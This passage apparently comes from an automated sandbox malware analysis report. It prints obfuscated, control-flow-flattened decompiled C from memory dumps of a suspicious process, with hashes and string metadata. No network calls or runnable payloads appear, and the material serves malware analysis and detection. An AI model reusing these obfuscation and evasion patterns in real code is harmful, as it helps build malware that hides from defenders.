                                              				char _v524;
                                              				intOrPtr _v536;
                                              				char _v540;
                                              				intOrPtr _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				signed int _v572;
                                              				signed int _v576;
                                              				signed int _v580;
                                              				signed int _v584;
                                              				signed int _v588;
                                              				signed int _v592;
                                              				signed int _v596;
                                              				signed int _v600;
                                              				signed int _v604;
                                              				signed int _v608;
                                              				signed int _v612;
                                              				signed int _v616;
                                              				signed int _v620;
                                              				signed int _v624;
                                              				signed int _v628;
                                              				signed int _v632;
                                              				signed int _v636;
                                              				unsigned int _v640;
                                              				signed int _v644;
                                              				signed int _v648;
                                              				signed int _v652;
                                              				signed int _v656;
                                              				signed int _v660;
                                              				signed int _v664;
                                              				signed int _v668;
                                              				signed int _v672;
                                              				signed int _v676;
                                              				signed int _v680;
                                              				signed int _v684;
                                              				void* _t354;
                                              				intOrPtr _t355;
                                              				intOrPtr _t359;
                                              				void* _t362;
                                              				void* _t367;
                                              				void* _t378;
                                              				intOrPtr _t383;
                                              				signed int _t386;
                                              				signed int _t387;
                                              				signed int _t388;
                                              				signed int _t389;
                                              				signed int _t390;
                                              				signed int _t391;
                                              				signed int _t392;
                                              				signed int _t393;
                                              				void* _t394;
                                              				void* _t395;
                                              				signed int _t401;
                                              				signed int _t435;
                                              				intOrPtr _t444;
                                              				signed int _t445;
                                              				intOrPtr _t449;
                                              				signed int* _t450;
                                              				void* _t452;
                                              
                                              				_t450 =  &_v684;
                                              				_v548 = _v548 & 0x00000000;
                                              				_v652 = 0x628b;
                                              				_v652 = _v652 | 0x8ea8a6c3;
                                              				_v652 = _v652 >> 8;
                                              				_v652 = _v652 ^ 0x078a89dd;
                                              				_v652 = _v652 ^ 0x0504213b;
                                              				_v656 = 0xca44;
                                              				_v656 = _v656 << 3;
                                              				_v656 = _v656 >> 0xa;
                                              				_v656 = _v656 | 0x073c6a17;
                                              				_v656 = _v656 ^ 0x073c621f;
                                              				_v664 = 0x16e0;
                                              				_v664 = _v664 + 0xffffe980;
                                              				_v664 = _v664 >> 8;
                                              				_v544 = __edx;
                                              				_t449 = __ecx;
                                              				_t445 = 0x351028fa;
                                              				_t386 = 0x6c;
                                              				_v664 = _v664 / _t386;
                                              				_v664 = _v664 ^ 0x00007066;
                                              				_v640 = 0x836e;
                                              				_v640 = _v640 + 0xb501;
                                              				_v640 = _v640 >> 2;
                                              				_v640 = _v640 ^ 0x000012b9;
                                              				_v628 = 0xb2ec;
                                              				_t387 = 0x41;
                                              				_v628 = _v628 * 0x46;
                                              				_v628 = _v628 + 0xd97;
                                              				_v628 = _v628 ^ 0x0030acaf;
                                              				_v576 = 0x565d;
                                              				_v576 = _v576 | 0xc8c85e8e;
                                              				_v576 = _v576 ^ 0xc8c86b89;
                                              				_v560 = 0xfa05;
                                              				_v560 = _v560 + 0x1743;
                                              				_v560 = _v560 ^ 0x00015cb0;
                                              				_v588 = 0x54a3;
                                              				_v588 = _v588 ^ 0x711a4c60;
                                              				_v588 = _v588 << 6;
                                              				_v588 = _v588 ^ 0x46864cc2;
                                              				_v596 = 0xba14;
                                              				_v596 = _v596 + 0xf2e8;
                                              				_v596 = _v596 + 0x1be7;
                                              				_v596 = _v596 ^ 0x00019f0a;
                                              				_v660 = 0x9a1f;
                                              				_v660 = _v660 / _t387;
                                              				_t388 = 0x56;
                                              				_v660 = _v660 * 0x79;
                                              				_v660 = _v660 << 0xd;
                                              				_v660 = _v660 ^ 0x23dca07a;
                                              				_v676 = 0x17dc;
                                              				_v676 = _v676 << 0xe;
                                              				_v676 = _v676 / _t388;
                                              				_v676 = _v676 + 0xffffccb5;
                                              				_v676 = _v676 ^ 0x0011ad2d;
                                              				_v636 = 0xbd70;
                                              				_v636 = _v636 | 0x80fc5ede;
                                              				_v636 = _v636 << 4;
                                              				_v636 = _v636 ^ 0x0fcfa70d;
                                              				_v608 = 0xbaf8;
                                              				_v608 = _v608 + 0xffff1119;
                                              				_t389 = 0x27;
                                              				_v608 = _v608 / _t389;
                                              				_v608 = _v608 ^ 0x06904b29;
                                              				_v684 = 0xf49f;
                                              				_t390 = 0x66;
                                              				_v684 = _v684 * 0x1f;
                                              				_v684 = _v684 + 0xffffe502;
                                              				_v684 = _v684 / _t390;
                                              				_v684 = _v684 ^ 0x00005c32;
                                              				_v668 = 0xe410;
                                              				_v668 = _v668 >> 0xc;
                                              				_v668 = _v668 + 0xffffc634;
                                              				_v668 = _v668 << 0xf;
                                              				_v668 = _v668 ^ 0xe3216c4d;
                                              				_v620 = 0x7d49;
                                              				_t391 = 0x24;
                                              				_v620 = _v620 * 0x1a;
                                              				_v620 = _v620 ^ 0x980c0cc6;
                                              				_v620 = _v620 ^ 0x9800e7e7;
                                              				_v564 = 0x5c7e;
                                              				_v564 = _v564 ^ 0x14aa654c;
                                              				_v564 = _v564 ^ 0x14aa562a;
                                              				_v552 = 0x450c;
                                              				_v552 = _v552 << 7;
                                              				_v552 = _v552 ^ 0x0022b9f7;
                                              				_v580 = 0x3573;
                                              				_v580 = _v580 >> 0xe;
                                              				_v580 = _v580 / _t391;
                                              				_v580 = _v580 ^ 0x000007cd;
                                              				_v584 = 0x18cc;
                                              				_v584 = _v584 >> 0xe;
                                              				_v584 = _v584 << 3;
                                              				_v584 = _v584 ^ 0x000042dd;
                                              				_v556 = 0x1e9b;
                                              				_v556 = _v556 + 0xffff5daa;
                                              				_v556 = _v556 ^ 0xffff6e35;
                                              				_v568 = 0x1617;
                                              				_v568 = _v568 << 4;
                                              				_v568 = _v568 ^ 0x000112eb;
                                              				_v572 = 0xca92;
                                              				_v572 = _v572 + 0x7b62;
                                              				_v572 = _v572 ^ 0x00017fbb;
                                              				_v592 = 0xd72f;
                                              				_v592 = _v592 | 0xe23ccaf6;
                                              				_v592 = _v592 + 0x7d96;
                                              				_v592 = _v592 ^ 0xe23d11e5;
                                              				_v644 = 0x4340;
                                              				_t392 = 7;
                                              				_v644 = _v644 * 0x73;
                                              				_v644 = _v644 | 0x11b8a473;
                                              				_v644 = _v644 ^ 0x11bec66f;
                                              				_v672 = 0x4860;
                                              				_v672 = _v672 / _t392;
                                              				_v672 = _v672 | 0x7c31fb12;
                                              				_v672 = _v672 ^ 0x5cc3fc4f;
                                              				_v672 = _v672 ^ 0x20f228b2;
                                              				_v680 = 0x617d;
                                              				_v680 = _v680 >> 0xd;
                                              				_v680 = _v680 | 0xd7e9f895;
                                              				_v680 = _v680 ^ 0xd7e9e095;
                                              				_v616 = 0xec2d;
                                              				_v616 = _v616 + 0xebc9;
                                              				_v616 = _v616 ^ 0x6282d746;
                                              				_v616 = _v616 ^ 0x6283789e;
                                              				_v600 = 0x3147;
                                              				_v600 = _v600 >> 0xe;
                                              				_t393 = 0x4c;
                                              				_t383 = _v544;
                                              				_t444 = _v544;
                                              				_v600 = _v600 * 0x6d;
                                              				_v600 = _v600 ^ 0x000035af;
                                              				_v604 = 0xdf1e;
                                              				_v604 = _v604 >> 0xa;
                                              				_v604 = _v604 + 0xffffe311;
                                              				_v604 = _v604 ^ 0xffffd288;
                                              				_v612 = 0xd6ea;
                                              				_v612 = _v612 << 0xc;
                                              				_v612 = _v612 * 0x1c;
                                              				_v612 = _v612 ^ 0x7819f753;
                                              				_v624 = 0x23;
                                              				_v624 = _v624 >> 6;
                                              				_v624 = _v624 ^ 0x0e47f934;
                                              				_v624 = _v624 ^ 0x0e47f086;
                                              				_v632 = 0x3384;
                                              				_v632 = _v632 >> 9;
                                              				_v632 = _v632 / _t393;
                                              				_v632 = _v632 ^ 0x000059c8;
                                              				_v648 = 0x4bab;
                                              				_v648 = _v648 * 0x33;
                                              				_v648 = _v648 ^ 0xea23b576;
                                              				_v648 = _v648 | 0x057acb41;
                                              				_v648 = _v648 ^ 0xef7effc2;
                                              				while(1) {
                                              					L1:
                                              					_t354 = 0x2d3a08fe;
                                              					while(1) {
                                              						L2:
                                              						_t394 = 0x2432fb60;
                                              						do {
                                              							while(1) {
                                              								L3:
                                              								_t452 = _t445 - _t394;
                                              								if(_t452 > 0) {
                                              									break;
                                              								}
                                              								if(_t452 == 0) {
                                              									_push( &_v524);
                                              									_push(_t394);
                                              									_t367 = E0022BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
                                              									_t450 =  &(_t450[7]);
                                              									if(_t367 != 0) {
                                              										E00234F7D(_v552, _v580, _v540);
                                              										E00234F7D(_v584, _v556, _v536);
                                              									}
                                              									_t435 = _v572;
                                              									_push(_v548);
                                              									_t401 = _v568;
                                              									L21:
                                              									E00234F7D(_t401, _t435);
                                              									L22:
                                              									_t445 = 0x2e38c466;
                                              									while(1) {
                                              										L1:
                                              										_t354 = 0x2d3a08fe;
                                              										goto L2;
                                              									}
                                              								} else {
                                              									if(_t445 == 0xd57030c) {
                                              										return E0022F536(_v624, _v632, _v648, _t444);
                                              									}
                                              									if(_t445 == 0x1b7bc3fb) {
                                              										E0022F326();
                                              										E0022F6DF(_t394);
                                              										_t354 = 0x2d3a08fe;
                                              										_t445 = 0x1f6584a2;
                                              										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
                                              										goto L2;
                                              									} else {
                                              										if(_t445 == 0x1f6584a2) {
                                              											if(_t383 != _t354) {
                                              												_t445 = 0x1fb1d4b9;
                                              												continue;
                                              											} else {
                                              												_push(_v652);
                                              												_push(_t394);
                                              												_t287 =  &_v676; // 0xe3216c4d
                                              												E002217AC(_v660,  &_v548,  *_t287, _t394);
                                              												_t450 =  &(_t450[5]);
                                              												asm("sbb esi, esi");
                                              												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
                                              												while(1) {
                                              													L1:
                                              													_t354 = 0x2d3a08fe;
                                              													L2:
                                              													_t394 = 0x2432fb60;
                                              													goto L3;
                                              												}
                                              											}
                                              										} else {
                                              											if(_t445 != 0x1fb1d4b9) {
                                              												goto L31;
                                              											} else {
                                              												_push( &_v524);
                                              												_push(0x23c910);
                                              												_t378 = E002288E5(_t449, _v544);
                                              												_t354 = 0x2d3a08fe;
                                              												if(_t378 == 0) {
                                              													if(_t383 == 0x2d3a08fe) {
                                              														E00234F7D(_v636, _v608, _v548);
                                              														_t354 = 0x2d3a08fe;
                                              													}
                                              													_t445 = 0xd57030c;
                                              													while(1) {
                                              														L2:
                                              														_t394 = 0x2432fb60;
                                              														goto L3;
                                              													}
                                              												} else {
                                              													_t394 = 0x2432fb60;
                                              													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
                                              													continue;
                                              												}
                                              											}
                                              										}
                                              									}
                                              								}
                                              								L24:
                                              								if(_t445 != 0x351028fa) {
                                              									if(_t445 != 0x35df9137) {
                                              										goto L31;
                                              									} else {
                                              										_push(_t394);
                                              										_push(_v680);
                                              										_push( &_v524);
                                              										_t312 =  &_v672; // 0x7066
                                              										_push( *_t312);
                                              										_push( &_v540);
                                              										_push(_v644);
                                              										_push(0);
                                              										_t362 = E0022568E(_v592, 0);
                                              										_t450 =  &(_t450[7]);
                                              										if(_t362 == 0) {
                                              											goto L22;
                                              										} else {
                                              											E00234F7D(_v616, _v600, _v540);
                                              											_t435 = _v612;
                                              											_push(_v536);
                                              											_t401 = _v604;
                                              											goto L21;
                                              										}
                                              										goto L28;
                                              									}
                                              									L34:
                                              									return _t359;
                                              								}
                                              								L28:
                                              								_push(_t394);
                                              								_push(_t394);
                                              								_t395 = 0x38;
                                              								_t359 = E00228736(_t395);
                                              								_t444 = _t359;
                                              								if(_t444 != 0) {
                                              									_t445 = 0x1b7bc3fb;
                                              									goto L1;
                                              								}
                                              								goto L34;
                                              							}
                                              							if(_t445 == 0x2e38c466) {
                                              								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
                                              								_t445 = 0xbb47724;
                                              								_t355 =  *0x23ca24; // 0x0
                                              								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
                                              								_t354 = 0x2d3a08fe;
                                              								 *0x23ca24 = _t444;
                                              								goto L31;
                                              							}
                                              							goto L24;
                                              							L31:
                                              						} while (_t445 != 0xbb47724);
                                              						return _t354;
                                              					}
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
                                              • API String ID: 0-964951681
                                              • Opcode ID: c33644122f12c9935ec19366d37bcddb48187bd2052bb5a0ac7438064dfd5e3e
                                              • Instruction ID: 8c9aa4b306ef730fe67dd2ef822d6097e980cae15f2da5443b3a1d4de1dc095c
                                              • Opcode Fuzzy Hash: c33644122f12c9935ec19366d37bcddb48187bd2052bb5a0ac7438064dfd5e3e
                                              • Instruction Fuzzy Hash: B102717150D3819FE368CF65E44AA4BBBF1BBC4708F50891DF199862A0D7B89949CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E0022E377() {
                                              				intOrPtr _t319;
                                              				intOrPtr _t322;
                                              				void* _t325;
                                              				intOrPtr _t326;
                                              				intOrPtr _t327;
                                              				intOrPtr _t329;
                                              				void* _t336;
                                              				intOrPtr* _t368;
                                              				signed int _t371;
                                              				signed int _t372;
                                              				signed int _t373;
                                              				void* _t374;
                                              				intOrPtr* _t376;
                                              				void* _t380;
                                              
                                              				 *(_t380 + 0x90) = 0x492ac5;
                                              				 *(_t380 + 0x94) = 0;
                                              				 *((intOrPtr*)(_t380 + 0x98)) = 0;
                                              				_t336 = 0x262df760;
                                              				 *(_t380 + 0x48) = 0xf735;
                                              				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
                                              				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
                                              				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
                                              				 *(_t380 + 4) = 0x4aa3;
                                              				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
                                              				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
                                              				 *(_t380 + 4) =  *(_t380 + 4) << 4;
                                              				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
                                              				 *(_t380 + 0x34) = 0x5ec9;
                                              				 *(_t380 + 0x8c) = 0;
                                              				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
                                              				_t371 = 0x70;
                                              				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
                                              				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
                                              				 *(_t380 + 0x60) = 0xe88e;
                                              				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
                                              				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
                                              				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
                                              				 *(_t380 + 0x58) = 0xbd5e;
                                              				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
                                              				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
                                              				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
                                              				 *(_t380 + 0x2c) = 0x606e;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
                                              				 *(_t380 + 0x4c) = 0xb86a;
                                              				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
                                              				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
                                              				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
                                              				 *(_t380 + 0x44) = 0x5cf7;
                                              				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
                                              				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
                                              				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
                                              				 *(_t380 + 0x74) = 0xd45b;
                                              				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
                                              				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
                                              				 *(_t380 + 0x14) = 0x87c2;
                                              				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
                                              				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
                                              				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
                                              				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
                                              				 *(_t380 + 0x6c) = 0x3ddc;
                                              				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
                                              				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
                                              				 *(_t380 + 0x3c) = 0xc186;
                                              				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
                                              				_t372 = 0x60;
                                              				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
                                              				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
                                              				 *(_t380 + 0x94) = 0x420b;
                                              				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
                                              				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
                                              				 *(_t380 + 0x24) = 0x5d05;
                                              				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
                                              				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
                                              				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
                                              				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
                                              				 *(_t380 + 0x78) = 0xceba;
                                              				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
                                              				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
                                              				 *(_t380 + 0x1c) = 0x6278;
                                              				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
                                              				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
                                              				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
                                              				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
                                              				 *(_t380 + 0x18) = 0x457c;
                                              				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
                                              				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
                                              				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
                                              				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
                                              				 *(_t380 + 0x4c) = 0x48c4;
                                              				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
                                              				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
                                              				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
                                              				 *(_t380 + 0x64) = 0xb936;
                                              				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
                                              				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
                                              				 *(_t380 + 0x20) = 0xcbd2;
                                              				_t373 = 0x7c;
                                              				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
                                              				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
                                              				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
                                              				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
                                              				 *(_t380 + 0x6c) = 0x94d3;
                                              				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
                                              				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
                                              				 *(_t380 + 0x90) = 0xca42;
                                              				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
                                              				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
                                              				 *(_t380 + 0x3c) = 0x3a85;
                                              				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
                                              				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
                                              				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
                                              				 *(_t380 + 0x74) = 0xaf39;
                                              				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
                                              				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
                                              				 *(_t380 + 0x84) = 0x7bfe;
                                              				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
                                              				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
                                              				 *(_t380 + 0x88) = 0xbca6;
                                              				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
                                              				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
                                              				 *(_t380 + 0x7c) = 0x7bcd;
                                              				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
                                              				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
                                              				 *(_t380 + 0x8c) = 0x5f89;
                                              				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
                                              				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
                                              				 *(_t380 + 0x2c) = 0x86b9;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
                                              				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
                                              				 *(_t380 + 0x50) = 0x2126;
                                              				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
                                              				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
                                              				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
                                              				 *(_t380 + 0x80) = 0xf6ec;
                                              				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
                                              				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
                                              				 *(_t380 + 0x60) = 0x3ac6;
                                              				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
                                              				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
                                              				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
                                              				 *(_t380 + 0x30) = 0x4848;
                                              				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
                                              				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
                                              				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
                                              				 *(_t380 + 0x34) = 0xf09c;
                                              				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
                                              				_t374 = 0x28650a76;
                                              				_t368 =  *((intOrPtr*)(_t380 + 0x98));
                                              				_t334 =  *((intOrPtr*)(_t380 + 0x98));
                                              				_t378 =  *((intOrPtr*)(_t380 + 0x98));
                                              				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
                                              				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
                                              				while(_t336 != 0xd3df7e1) {
                                              					if(_t336 == 0x132cc48f) {
                                              						E0022F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
                                              						_t336 = 0xd3df7e1;
                                              						continue;
                                              					}
                                              					if(_t336 == 0x159b7bb7) {
                                              						_push(_t336);
                                              						_push(_t336);
                                              						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
                                              						_t368 = E00228736(0x1000);
                                              						__eflags = _t368;
                                              						_t336 =  !=  ? _t374 : 0xd3df7e1;
                                              						continue;
                                              					}
                                              					if(_t336 == 0x18c2a499) {
                                              						_t319 = E0022B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
                                              						_t334 = _t319;
                                              						_t380 = _t380 + 0x30;
                                              						__eflags = _t319 - 0xffffffff;
                                              						if(__eflags == 0) {
                                              							L29:
                                              							__eflags = 0;
                                              							return 0;
                                              						}
                                              						_t336 = 0x159b7bb7;
                                              						continue;
                                              					}
                                              					if(_t336 == 0x1a0fbde3) {
                                              						E00233E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
                                              						_t322 = E002228CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
                                              						_t378 = _t322;
                                              						_t380 = _t380 + 0xc;
                                              						_t336 = 0x18c2a499;
                                              						 *((short*)(_t322 - 2)) = 0;
                                              						continue;
                                              					}
                                              					if(_t336 == 0x262df760) {
                                              						_t336 = 0x1a0fbde3;
                                              						continue;
                                              					}
                                              					if(_t336 != _t374) {
                                              						L28:
                                              						__eflags = _t336 - 0x1c26cb40;
                                              						if(__eflags != 0) {
                                              							continue;
                                              						}
                                              						goto L29;
                                              					}
                                              					_t325 = E00236319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
                                              					_t380 = _t380 + 0x30;
                                              					if(_t325 == 0) {
                                              						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
                                              						L18:
                                              						__eflags = _t326;
                                              						if(__eflags == 0) {
                                              							_t336 = _t374;
                                              						} else {
                                              							_t327 =  *0x23ca30; // 0x0
                                              							E00238A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
                                              							_t380 = _t380 + 0xc;
                                              							_t336 = 0x132cc48f;
                                              						}
                                              						continue;
                                              					}
                                              					_t376 = _t368;
                                              					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00228624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
                                              						_t329 =  *_t376;
                                              						if(_t329 == 0) {
                                              							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
                                              							L17:
                                              							_t374 = 0x28650a76;
                                              							goto L18;
                                              						}
                                              						_t376 = _t376 + _t329;
                                              					}
                                              					_t326 = 1;
                                              					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
                                              					goto L17;
                                              				}
                                              				E00234F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
                                              				_t336 = 0x1c26cb40;
                                              				goto L28;
                                              			}


















                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
                                              • API String ID: 823142352-1348462970
                                              • Opcode ID: 6f7f6e1a65d51a1351a8efa0b65ca5839172cfca3cbd14bacd242c2d434415f7
                                              • Instruction ID: 939b984d0d9c51bdfdf966c50bb545969ff41e3b856e396f273d19ba55577076
                                              • Opcode Fuzzy Hash: 6f7f6e1a65d51a1351a8efa0b65ca5839172cfca3cbd14bacd242c2d434415f7
                                              • Instruction Fuzzy Hash: A4F15071118381AFE768CF65C54AA5BBBF1BBC4708F108A1DF1DA862A0D7B58919DF03
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00236DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v4;
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				void* _t224;
                                              				void* _t243;
                                              				void* _t256;
                                              				void* _t264;
                                              				void* _t288;
                                              				signed int _t290;
                                              				signed int _t291;
